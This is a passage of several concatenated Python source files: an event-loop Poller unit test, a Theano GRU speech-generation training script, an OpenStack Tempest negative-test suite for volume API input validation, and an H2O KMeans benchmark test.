self.assertGreater(len(lines), 0)
self.assertEqual(err.read(), '')
mp.close()
s1.close(); s2.close()
class TestPoller(UnitTest):
def test_add_remove(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, READABLE, callback)
self.assertIsNotNone(handle)
called.wait(0.01)
self.assertEqual(cbargs, [])
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE)])
del cbargs[:]; called.clear()
poll.remove_callback(fd, handle)
called.wait(0.01)
self.assertEqual(cbargs, [])
poll.close()
s1.close(); s2.close()
def test_update(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, WRITABLE, callback)
self.assertIsNotNone(handle)
called.wait(0.1)
self.assertEqual(cbargs, [(fd, WRITABLE)])
del cbargs[:]; called.clear()
poll.update_callback(fd, handle, READABLE|WRITABLE)
s1.send(b'x')
called.wait(0.1)
self.assertEqual(cbargs, [(fd, READABLE|WRITABLE)])
del cbargs[:]; called.clear()
poll.close()
s1.close(); s2.close()
def test_close(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s1, s2 = socketpair()
fd = s2.fileno()
handle = poll.add_callback(fd, READABLE, callback)
self.assertIsNotNone(handle)
s1.send(b'x')
poll.close()
called.wait(0.01)
self.assertEqual(cbargs, [])
self.assertRaises(RuntimeError, poll.add_callback, fd, READABLE, callback)
self.assertRaises(RuntimeError, poll.remove_callback, fd, handle)
self.assertRaises(RuntimeError, poll.update_callback, fd, handle, WRITABLE)
s1.close(); s2.close()
def test_multiple_fds(self):
poll = Poller(get_hub().loop)
cbargs = []
called = Event()
def callback(fd, events):
cbargs.append((fd, events))
called.set()
s11, s12 = socketpair()
fd1 = s12.fileno()
poll.add_callback(fd1, READABLE, callback)
s21, s22 = socketpair()
fd2 = s22.fileno()
poll.add_callback(fd2, READABLE, callback)
s11.send(b'x')
s21.send(b'x')
called.wait()
self.assertEqual(cbargs, [(fd1, READABLE), (fd2, READABLE)])
poll.close()
s11.close(); s12.close()
s21.close(); s22.close()
if __name__ == '__main__':
unittest.main()
|
|
from __future__ import print_function
import numpy as np
import theano
from theano import tensor
from theano.sandbox.rng_mrg import MRG_RandomStreams as RandomStreams
from scipy.io import wavfile
import os
import sys
from kdllib import audio_file_iterator
from kdllib import numpy_softmax, numpy_sample_softmax
from kdllib import param, param_search, print_param_info
from kdllib import LearnedInitHidden
from kdllib import Linear
from kdllib import Embedding
from kdllib import Igor
from kdllib import load_checkpoint, theano_one_hot, concatenate
from kdllib import fetch_fruitspeech, list_iterator
from kdllib import np_zeros, GRU, GRUFork
from kdllib import make_weights, make_biases, relu, run_loop
from kdllib import as_shared, adam, gradient_clipping
from kdllib import get_values_from_function, set_shared_variables_in_function
from kdllib import soundsc, categorical_crossentropy
from kdllib import relu, softmax, sample_softmax
if __name__ == "__main__":
import argparse
fs = 16000
minibatch_size = 128
cut_len = 64
n_epochs = 1000 # Used way at the bottom in the training loop!
checkpoint_every_n_epochs = 1
checkpoint_every_n_updates = 1000
checkpoint_every_n_seconds = 60 * 60
random_state = np.random.RandomState(1999)
filepath = "/Tmp/kastner/blizzard_wav_files/*flac"
train_itr = audio_file_iterator(filepath, minibatch_size=minibatch_size,
stop_index=.9, preprocess="quantize")
valid_itr = audio_file_iterator(filepath, minibatch_size=minibatch_size,
start_index=.9, preprocess="quantize")
X_mb, X_mb_mask = next(train_itr)
train_itr.reset()
input_dim = 256
n_embed = 256
n_hid = 512
n_proj = 512
n_bins = 256
desc = "Speech generation"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('-s', '--sample',
help='Sample from a checkpoint file',
default=None,
required=False)
def restricted_int(x):
if x is None:
# None makes it "auto" sample
return x
x = int(x)
if x < 1:
raise argparse.ArgumentTypeError("%r not range [1, inf]" % (x,))
return x
parser.add_argument('-sl', '--sample_length',
help='Number of steps to sample, default is automatic',
type=restricted_int,
default=None,
required=False)
def restricted_float(x):
if x is None:
# None makes it "auto" temperature
return x
x = float(x)
if x <= 0:
raise argparse.ArgumentTypeError("%r not range (0, inf]" % (x,))
return x
parser.add_argument('-t', '--temperature',
help='Sampling temperature for softmax',
type=restricted_float,
default=None,
required=False)
parser.add_argument('-c', '--continue', dest="cont",
help='Continue training from another saved model',
default=None,
required=False)
args = parser.parse_args()
if args.sample is not None:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
checkpoint_file = args.sample
if not os.path.exists(checkpoint_file):
raise ValueError("Checkpoint file path %s" % checkpoint_file,
" does not exist!")
print(checkpoint_file)
checkpoint_dict = load_checkpoint(checkpoint_file)
X_mb, X_mb_mask = next(train_itr)
train_itr.reset()
prev_h1, prev_h2, prev_h3 = [np_zeros((minibatch_size, n_hid))
for i in range(3)]
predict_function = checkpoint_dict["predict_function"]
sample_function = checkpoint_dict["sample_function"]
if args.temperature is None:
args.temperature = 1.
if args.sample_length is None:
raise ValueError("NYI - use -sl or --sample_length ")
else:
fixed_steps = args.sample_length
temperature = args.temperature
completed = []
# 0 is in the middle
# CANNOT BE 1 timestep - will get floating point exception!
init_x = 127 + np_zeros((2, minibatch_size, 1)).astype(theano.config.floatX)
for i in range(fixed_steps):
if i % 100 == 0:
print("Sampling step %i" % i)
rvals = sample_function(init_x, prev_h1, prev_h2,
prev_h3)
sampled, h1_s, h2_s, h3_s = rvals
pred_s = numpy_softmax(sampled, temperature=temperature)
# use 0 since it is a moving window
choice = numpy_sample_softmax(pred_s[0], random_state)
choice = choice[None]
completed.append(choice)
# use 2 since scan is throwing exceptions
init_x = np.concatenate((choice[..., None], choice[..., None]),
axis=0)
init_x = init_x.astype(theano.config.floatX)
# use last hidden
prev_h1 = h1_s[0]
prev_h2 = h2_s[0]
prev_h3 = h3_s[0]
print("Completed sampling after %i steps" % fixed_steps)
# mb, length
completed = np.array(completed)[:, 0, :]
completed = completed.transpose(1, 0)
# all samples would be range(len(completed))
for i in range(10):
ex = completed[i].ravel()
s = "gen_%i.wav" % (i)
ex = ex.astype("float32")
"""
ex -= ex.min()
ex /= ex.max()
ex -= 0.5
ex *= 0.95
wavfile.write(s, fs, ex)
"""
wavfile.write(s, fs, soundsc(ex))
print("Sampling complete, exiting...")
sys.exit()
else:
print("No plotting arguments, starting training mode!")
X_sym = tensor.tensor3("X_sym")
X_sym.tag.test_value = X_mb[:cut_len]
X_mask_sym = tensor.matrix("X_mask_sym")
X_mask_sym.tag.test_value = X_mb_mask[:cut_len]
init_h1_i = tensor.matrix("init_h1")
init_h1_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h2_i = tensor.matrix("init_h2")
init_h2_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h3_i = tensor.matrix("init_h3")
init_h3_i.tag.test_value = np_zeros((minibatch_size, n_hid))
init_h1, init_h2, init_h3 = LearnedInitHidden(
[init_h1_i, init_h2_i, init_h3_i], 3 * [(minibatch_size, n_hid)])
inpt = X_sym[:-1]
target = X_sym[1:]
mask = X_mask_sym[:-1]
embed_dim = 256
embed1 = Embedding(inpt, 256, embed_dim, random_state)
in_h1, ingate_h1 = GRUFork([embed1], [embed_dim], n_hid, random_state)
def step(in_h1_t, ingate_h1_t,
h1_tm1, h2_tm1, h3_tm1):
h1_t = GRU(in_h1_t, ingate_h1_t, h1_tm1, n_hid, n_hid, random_state)
h1_h2_t, h1gate_h2_t = GRUFork([h1_t], [n_hid], n_hid, random_state)
h2_t = GRU(h1_h2_t, h1gate_h2_t, h2_tm1,
n_hid, n_hid, random_state)
h2_h3_t, h2gate_h3_t = GRUFork([h2_t], [n_hid], n_hid, random_state)
h3_t = GRU(h2_h3_t,
h2gate_h3_t, h3_tm1,
n_hid, n_hid, random_state)
return h1_t, h2_t, h3_t
(h1, h2, h3), updates = theano.scan(
fn=step,
sequences=[in_h1, ingate_h1],
outputs_info=[init_h1, init_h2, init_h3])
out = Linear([h3], [n_hid], n_bins, random_state)
pred = softmax(out)
shp = target.shape
target = target.reshape((shp[0], shp[1]))
target = theano_one_hot(target, n_classes=n_bins)
# dimshuffle so batch is on last axis
cost = categorical_crossentropy(pred, target)
cost = cost * mask.dimshuffle(0, 1)
# sum over sequence length and features, mean over minibatch
cost = cost.dimshuffle(1, 0)
cost = cost.mean()
# convert to bits vs nats
cost = cost * tensor.cast(1.44269504089, theano.config.floatX)
params = param_search(cost, lambda x: hasattr(x, "param"))
print_param_info(params)
grads = tensor.grad(cost, params)
grads = [tensor.clip(g, -1., 1.) for g in grads]
learning_rate = 1E-3
opt = adam(params, learning_rate)
updates = opt.updates(params, grads)
if args.cont is not None:
print("Continuing training from saved model")
continue_path = args.cont
if not os.path.exists(continue_path):
raise ValueError("Continue model %s, path not "
"found" % continue_path)
saved_checkpoint = load_checkpoint(continue_path)
checkpoint_dict = saved_checkpoint
train_function = checkpoint_dict["train_function"]
cost_function = checkpoint_dict["cost_function"]
predict_function = checkpoint_dict["predict_function"]
sample_function = checkpoint_dict["sample_function"]
"""
trained_weights = get_values_from_function(
saved_checkpoint["train_function"])
set_shared_variables_in_function(train_function, trained_weights)
"""
else:
train_function = theano.function([X_sym, X_mask_sym,
init_h1_i, init_h2_i, init_h3_i],
[cost, h1, h2, h3],
updates=updates,
on_unused_input="warn")
cost_function = theano.function([X_sym, X_mask_sym,
init_h1_i, init_h2_i, init_h3_i],
[cost, h1, h2, h3],
on_unused_input="warn")
predict_function = theano.function([inpt,
init_h1_i, init_h2_i, init_h3_i],
[out, h1, h2, h3],
on_unused_input="warn")
sample_function = theano.function([inpt,
init_h1_i, init_h2_i, init_h3_i],
[out, h1, h2, h3],
on_unused_input="warn")
print("Beginning training loop")
checkpoint_dict = {}
checkpoint_dict["train_function"] = train_function
checkpoint_dict["cost_function"] = cost_function
checkpoint_dict["predict_function"] = predict_function
checkpoint_dict["sample_function"] = sample_function
def _loop(function, itr):
prev_h1, prev_h2, prev_h3 = [np_zeros((minibatch_size, n_hid))
for i in range(3)]
X_mb, X_mb_mask = next(itr)
# sanity check that masking code is OK
assert X_mb_mask.min() > 1E-6
n_cuts = len(X_mb) // cut_len + 1
partial_costs = []
for n in range(n_cuts):
if n % 100 == 0:
print("step %i" % n, end="")
else:
print(".", end="")
start = n * cut_len
stop = (n + 1) * cut_len
if len(X_mb[start:stop]) < cut_len:
# skip end edge case
break
rval = function(X_mb[start:stop],
X_mb_mask[start:stop],
prev_h1, prev_h2, prev_h3)
current_cost = rval[0]
prev_h1, prev_h2, prev_h3 = rval[1:4]
prev_h1 = prev_h1[-1]
prev_h2 = prev_h2[-1]
prev_h3 = prev_h3[-1]
partial_costs.append(current_cost)
print("")
return partial_costs
i = Igor(_loop, train_function, train_itr, cost_function, valid_itr,
n_epochs=n_epochs, checkpoint_dict=checkpoint_dict,
checkpoint_every_n_updates=checkpoint_every_n_updates,
checkpoint_every_n_seconds=checkpoint_every_n_seconds,
checkpoint_every_n_epochs=checkpoint_every_n_epochs,
skip_minimums=True)
#i.refresh(_loop, train_function, train_itr, cost_function, valid_itr,
# n_epochs, checkpoint_dict)
i.run()
|
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest.api.volume import base
from tempest.common.utils import data_utils
from tempest import exceptions
from tempest import test
class VolumesNegativeTest(base.BaseVolumeV1Test):
_interface = 'json'
@classmethod
@test.safe_setup
def setUpClass(cls):
super(VolumesNegativeTest, cls).setUpClass()
cls.client = cls.volumes_client
# Create a test shared instance and volume for attach/detach tests
cls.volume = cls.create_volume()
cls.mountpoint = "/dev/vdc"
@test.attr(type=['negative', 'gate'])
def test_volume_get_nonexistent_volume_id(self):
# Should not be able to get a non-existent volume
self.assertRaises(exceptions.NotFound, self.client.get_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_volume_delete_nonexistent_volume_id(self):
# Should not be able to delete a non-existent Volume
self.assertRaises(exceptions.NotFound, self.client.delete_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_invalid_size(self):
# Should not be able to create volume with invalid size
# in request
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='#$%', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_out_passing_size(self):
# Should not be able to create volume without passing size
# in request
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_size_zero(self):
# Should not be able to create volume with size zero
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='0', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_size_negative(self):
# Should not be able to create volume with size negative
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.BadRequest, self.client.create_volume,
size='-1', display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_volume_type(self):
# Should not be able to create volume with non-existent volume type
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', volume_type=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_snapshot_id(self):
# Should not be able to create volume with non-existent snapshot
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', snapshot_id=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_create_volume_with_nonexistent_source_volid(self):
# Should not be able to create volume with non-existent source volume
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.create_volume,
size='1', source_volid=str(uuid.uuid4()),
display_name=v_name, metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_nonexistent_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id=str(uuid.uuid4()), display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_invalid_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id='#$%%&^&^', display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_update_volume_with_empty_volume_id(self):
v_name = data_utils.rand_name('Volume-')
metadata = {'Type': 'work'}
self.assertRaises(exceptions.NotFound, self.client.update_volume,
volume_id='', display_name=v_name,
metadata=metadata)
@test.attr(type=['negative', 'gate'])
def test_get_invalid_volume_id(self):
# Should not be able to get volume with invalid id
self.assertRaises(exceptions.NotFound, self.client.get_volume,
'#$%%&^&^')
@test.attr(type=['negative', 'gate'])
def test_get_volume_without_passing_volume_id(self):
# Should not be able to get volume when empty ID is passed
self.assertRaises(exceptions.NotFound, self.client.get_volume, '')
@test.attr(type=['negative', 'gate'])
def test_delete_invalid_volume_id(self):
# Should not be able to delete volume when invalid ID is passed
self.assertRaises(exceptions.NotFound, self.client.delete_volume,
'!@#$%^&*()')
@test.attr(type=['negative', 'gate'])
def test_delete_volume_without_passing_volume_id(self):
# Should not be able to delete volume when empty ID is passed
self.assertRaises(exceptions.NotFound, self.client.delete_volume, '')
@test.attr(type=['negative', 'gate'])
@test.services('compute')
def test_attach_volumes_with_nonexistent_volume_id(self):
srv_name = data_utils.rand_name('Instance-')
resp, server = self.servers_client.create_server(srv_name,
self.image_ref,
self.flavor_ref)
self.addCleanup(self.servers_client.delete_server, server['id'])
self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')
self.assertRaises(exceptions.NotFound,
self.client.attach_volume,
str(uuid.uuid4()),
server['id'],
self.mountpoint)
@test.attr(type=['negative', 'gate'])
def test_detach_volumes_with_invalid_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.detach_volume,
'xxx')
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_size_smaller_than_original_size(self):
# Extend volume with smaller size than original size.
extend_size = 0
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_non_number_size(self):
# Extend volume when size is non number.
extend_size = 'abc'
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_None_size(self):
# Extend volume with None size.
extend_size = None
self.assertRaises(exceptions.BadRequest, self.client.extend_volume,
self.volume['id'], extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_with_nonexistent_volume_id(self):
# Extend volume size when volume is nonexistent.
extend_size = int(self.volume['size']) + 1
self.assertRaises(exceptions.NotFound, self.client.extend_volume,
str(uuid.uuid4()), extend_size)
@test.attr(type=['negative', 'gate'])
def test_volume_extend_without_passing_volume_id(self):
# Extend volume size when passing volume id is None.
extend_size = int(self.volume['size']) + 1
self.assertRaises(exceptions.NotFound, self.client.extend_volume,
None, extend_size)
@test.attr(type=['negative', 'gate'])
def test_reserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.reserve_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_unreserve_volume_with_nonexistent_volume_id(self):
self.assertRaises(exceptions.NotFound,
self.client.unreserve_volume,
str(uuid.uuid4()))
@test.attr(type=['negative', 'gate'])
def test_reserve_volume_with_negative_volume_status(self):
# Mark volume as reserved.
resp, body = self.client.reserve_volume(self.volume['id'])
self.assertEqual(202, resp.status)
# Mark volume which is marked as reserved before
self.assertRaises(exceptions.BadRequest,
self.client.reserve_volume,
self.volume['id'])
# Unmark volume as reserved.
resp, body = self.client.unreserve_volume(self.volume['id'])
self.assertEqual(202, resp.status)
@test.attr(type=['negative', 'gate'])
def test_list_volumes_with_nonexistent_name(self):
v_name = data_utils.rand_name('Volume-')
params = {'display_name': v_name}
resp, fetched_volume = self.client.list_volumes(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_detail_with_nonexistent_name(self):
v_name = data_utils.rand_name('Volume-')
params = {'display_name': v_name}
resp, fetched_volume = self.client.list_volumes_with_detail(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_with_invalid_status(self):
params = {'status': 'null'}
resp, fetched_volume = self.client.list_volumes(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
@test.attr(type=['negative', 'gate'])
def test_list_volumes_detail_with_invalid_status(self):
params = {'status': 'null'}
resp, fetched_volume = self.client.list_volumes_with_detail(params)
self.assertEqual(200, resp.status)
self.assertEqual(0, len(fetched_volume))
class VolumesNegativeTestXML(VolumesNegativeTest):
_interface = 'xml'
|
|
import unittest, time, sys, random, math, json
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_kmeans, h2o_import as h2i, h2o_common
print "Assumes you ran ../build_for_clone.py in this directory"
print "Using h2o-nodes.json. Also the sandbox dir"
DELETE_KEYS_EACH_ITER = True
DO_KMEANS = True
NA_COL_BUG = True
SCALE_SIZE = 7 # for scaling the expected results from the 128GB case (7x the 26GB case)
# assumes the cloud was built with CDH3? maybe doesn't matter as long as the file is there
FROM_HDFS = 'CDH3' # not really used
class releaseTest(h2o_common.ReleaseCommon, unittest.TestCase):
def test_c5_KMeans_sphere_26GB_fvec(self):
# a kludge
h2o.setup_benchmark_log()
# csvFilename = 'syn_sphere15_2711545732row_6col_180GB_from_7x.csv'
csvFilename = 'syn_sphere15_gen_26GB.csv'
# csvFilename = 'syn_sphere_gen_h1m.csv'
# csvFilename = 'syn_sphere_gen_real_1.49M.csv'
# csvFilename = 'syn_sphere_gen_h1m_no_na.csv'
totalBytes = 183538602156
if FROM_HDFS:
importFolderPath = "datasets/kmeans_big"
csvPathname = importFolderPath + '/' + csvFilename
else:
importFolderPath = "/home3/0xdiag/datasets/kmeans_big"
csvPathname = importFolderPath + '/' + csvFilename
# FIX! put right values in
# will there be different expected for random vs the other inits?
if NA_COL_BUG:
expected = [
# the centers are the same for the 26GB and 180GB. The # of rows is right for 180GB,
# so shouldn't be used for 26GB
# or it should be divided by 7
# the distribution is the same, obviously.
([-113.00566692375459, -89.99595447985321, -455.9970643424373, 4732.0, 49791778.0, 36800.0], 248846122, 1308149283316.2988) ,
([1.0, 1.0, -525.0093818313685, 2015.001629398412, 25654042.00592703, 28304.0], 276924291, 1800760152555.98) ,
([5.0, 2.0, 340.0, 1817.995920197288, 33970406.992053084, 31319.99486705394], 235089554, 375419158808.3253) ,
([10.0, -72.00113070337981, -171.0198611715457, 4430.00952228909, 37007399.0, 29894.0], 166180630, 525423632323.6474) ,
([11.0, 3.0, 578.0043558141306, 1483.0163188052604, 22865824.99639042, 5335.0], 167234179, 1845362026223.1094) ,
([12.0, 3.0, 168.0, -4066.995950679284, 41077063.00269915, -47537.998050740985], 195420925, 197941282992.43475) ,
([19.00092954923767, -10.999565572612255, 90.00028669073289, 1928.0, 39967190.0, 27202.0], 214401768, 11868360232.658035) ,
([20.0, 0.0, 141.0, -3263.0030236302937, 6163210.990273981, 30712.99115201907], 258853406, 598863991074.3276) ,
([21.0, 114.01584574295777, 242.99690338815898, 1674.0029079209912, 33089556.0, 36415.0], 190979054, 1505088759456.314) ,
([25.0, 1.0, 614.0032787274755, -2275.9931284021022, -48473733.04122273, 47343.0], 87794427, 1124697008162.3955) ,
([39.0, 3.0, 470.0, -3337.9880599007597, 28768057.98852736, 16716.003410920028], 78226988, 1151439441529.0215) ,
([40.0, 1.0, 145.0, 950.9990795199593, 14602680.991458317, -14930.007919032574], 167273589, 693036940951.0249) ,
([42.0, 4.0, 479.0, -3678.0033024834297, 8209673.001421165, 11767.998552236539], 148426180, 35942838893.32379) ,
([48.0, 4.0, 71.0, -951.0035145455234, 49882273.00063991, -23336.998167498707], 157533313, 88431531357.62982) ,
([147.00394564757505, 122.98729664236723, 311.0047920137008, 2320.0, 46602185.0, 11212.0], 118361306, 1111537045743.7646) ,
]
else:
expected = [
([0.0, -113.00566692375459, -89.99595447985321, -455.9970643424373, 4732.0, 49791778.0, 36800.0], 248846122, 1308149283316.2988) ,
([0.0, 1.0, 1.0, -525.0093818313685, 2015.001629398412, 25654042.00592703, 28304.0], 276924291, 1800760152555.98) ,
([0.0, 5.0, 2.0, 340.0, 1817.995920197288, 33970406.992053084, 31319.99486705394], 235089554, 375419158808.3253) ,
([0.0, 10.0, -72.00113070337981, -171.0198611715457, 4430.00952228909, 37007399.0, 29894.0], 166180630, 525423632323.6474) ,
([0.0, 11.0, 3.0, 578.0043558141306, 1483.0163188052604, 22865824.99639042, 5335.0], 167234179, 1845362026223.1094) ,
([0.0, 12.0, 3.0, 168.0, -4066.995950679284, 41077063.00269915, -47537.998050740985], 195420925, 197941282992.43475) ,
([0.0, 19.00092954923767, -10.999565572612255, 90.00028669073289, 1928.0, 39967190.0, 27202.0], 214401768, 11868360232.658035) ,
([0.0, 20.0, 0.0, 141.0, -3263.0030236302937, 6163210.990273981, 30712.99115201907], 258853406, 598863991074.3276) ,
([0.0, 21.0, 114.01584574295777, 242.99690338815898, 1674.0029079209912, 33089556.0, 36415.0], 190979054, 1505088759456.314) ,
([0.0, 25.0, 1.0, 614.0032787274755, -2275.9931284021022, -48473733.04122273, 47343.0], 87794427, 1124697008162.3955) ,
([0.0, 39.0, 3.0, 470.0, -3337.9880599007597, 28768057.98852736, 16716.003410920028], 78226988, 1151439441529.0215) ,
([0.0, 40.0, 1.0, 145.0, 950.9990795199593, 14602680.991458317, -14930.007919032574], 167273589, 693036940951.0249) ,
([0.0, 42.0, 4.0, 479.0, -3678.0033024834297, 8209673.001421165, 11767.998552236539], 148426180, 35942838893.32379) ,
([0.0, 48.0, 4.0, 71.0, -951.0035145455234, 49882273.00063991, -23336.998167498707], 157533313, 88431531357.62982) ,
([0.0, 147.00394564757505, 122.98729664236723, 311.0047920137008, 2320.0, 46602185.0, 11212.0], 118361306, 1111537045743.7646) ,
]
benchmarkLogging = ['cpu','disk', 'network', 'iostats', 'jstack']
benchmarkLogging = ['cpu','disk', 'network', 'iostats']
# IOStatus can hang?
benchmarkLogging = ['cpu', 'disk', 'network']
benchmarkLogging = []
for trial in range(6):
# IMPORT**********************************************
# since H2O deletes the source key, re-import every iteration.
# PARSE ****************************************
print "Parse starting: " + csvFilename
hex_key = csvFilename + "_" + str(trial) + ".hex"
start = time.time()
timeoutSecs = 2 * 3600
kwargs = {}
if FROM_HDFS:
parseResult = h2i.import_parse(path=csvPathname, schema='hdfs', hex_key=hex_key,
timeoutSecs=timeoutSecs, pollTimeoutSecs=60, retryDelaySecs=2,
benchmarkLogging=benchmarkLogging, doSummary=False, **kwargs)
else:
parseResult = h2i.import_parse(path=csvPathname, schema='local', hex_key=hex_key,
timeoutSecs=timeoutSecs, pollTimeoutSecs=60, retryDelaySecs=2,
benchmarkLogging=benchmarkLogging, doSummary=False, **kwargs)
elapsed = time.time() - start
fileMBS = (totalBytes/1e6)/elapsed
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:6.2f} MB/sec for {:.2f} secs'.format(
len(h2o.nodes), h2o.nodes[0].java_heap_GB, 'Parse', csvPathname, fileMBS, elapsed)
print "\n"+l
h2o.cloudPerfH2O.message(l)
inspect = h2o_cmd.runInspect(key=parseResult['destination_key'], timeoutSecs=300)
numRows = inspect['numRows']
numCols = inspect['numCols']
summary = h2o_cmd.runSummary(key=parseResult['destination_key'], numRows=numRows, numCols=numCols, timeoutSecs=300)
h2o_cmd.infoFromSummary(summary)
# KMeans ****************************************
if not DO_KMEANS:
continue
print "col 0 is enum in " + csvFilename + " but KMeans should skip that automatically?? or no?"
kwargs = {
'k': 15,
'max_iter': 500,
# 'normalize': 1,
'normalize': 0, # temp try
'initialization': 'Furthest',
'destination_key': 'junk.hex',
# we get NaNs if whole col is NA
'ignored_cols': 'C1',
'normalize': 0,
# reuse the same seed, to get deterministic results
'seed': 265211114317615310,
}
if (trial%3)==0:
kwargs['initialization'] = 'PlusPlus'
elif (trial%3)==1:
kwargs['initialization'] = 'Furthest'
else:
kwargs['initialization'] = None
timeoutSecs = 4 * 3600
params = kwargs
paramsString = json.dumps(params)
start = time.time()
kmeansResult = h2o_cmd.runKMeans(parseResult=parseResult, timeoutSecs=timeoutSecs,
benchmarkLogging=benchmarkLogging, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvPathname, 'took', elapsed, 'seconds.', "%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
print "kmeans result:", h2o.dump_json(kmeansResult)
l = '{!s} jvms, {!s}GB heap, {:s} {:s} {:s} for {:.2f} secs {:s}' .format(
len(h2o.nodes), h2o.nodes[0].java_heap_GB, "KMeans", "trial "+str(trial), csvFilename, elapsed, paramsString)
print l
h2o.cloudPerfH2O.message(l)
# his does predict
(centers, tupleResultList) = h2o_kmeans.bigCheckResults(self, kmeansResult, csvPathname, parseResult, 'd', **kwargs)
# all are multipliers of expected tuple value
allowedDelta = (0.01, 0.01, 0.01)
# these clusters were sorted compared to the cluster order in training
h2o_kmeans.showClusterDistribution(self, tupleResultList, expected, trial=trial)
# why is the expected # of rows not right in KMeans2. That means predictions are wrong
h2o_kmeans.compareResultsToExpected(self, tupleResultList, expected, allowedDelta, allowError=False,
allowRowError=True, trial=trial)
# the tupleResultList has the size during predict? compare it to the sizes during training
# I assume they're in the same order.
model = kmeansResult['model']
size = model['size']
size2 = [t[1] for t in tupleResultList]
if 1==1: # debug
print "training size:", size
print "predict size2:", size2
print "training sorted(size):", sorted(size)
print "predict sorted(size2):", sorted(size2)
print h2o.nodes[0].http_addr
print h2o.nodes[0].port
clusters = model["centers"]
cluster_variances = model["within_cluster_variances"]
error = model["total_within_SS"]
iterations = model["iterations"]
normalized = model["normalized"]
max_iter = model["max_iter"]
print "iterations", iterations
if iterations >= (max_iter-1): # h2o hits the limit at max_iter-1..shouldn't hit it
raise Exception("trial: %s KMeans unexpectedly took %s iterations..which was the full amount allowed by max_iter %s",
(trial, iterations, max_iter))
# this size stuff should be compared now in compareResultsToExpected()..leave it here to make sure
# can't do this compare, because size2 is sorted by center order..
# so we don't know how to reorder size the same way
# we could just sort the two of them, for some bit of comparison.
if sorted(size)!=sorted(size2):
raise Exception("trial: %s training cluster sizes: %s not the same as predict on same data: %s" % (trial, size, size2))
# our expected result is sorted by cluster center ordered. but the sizes are from the predicted histogram
expectedSize = [t[1]/SCALE_SIZE for t in expected]
if size2!=expectedSize:
raise Exception("trial: %s training cluster sizes: %s not the same as expected: %s" % (trial, size, expectedSize))
if DELETE_KEYS_EACH_ITER:
h2i.delete_keys_at_all_nodes()
if __name__ == '__main__':
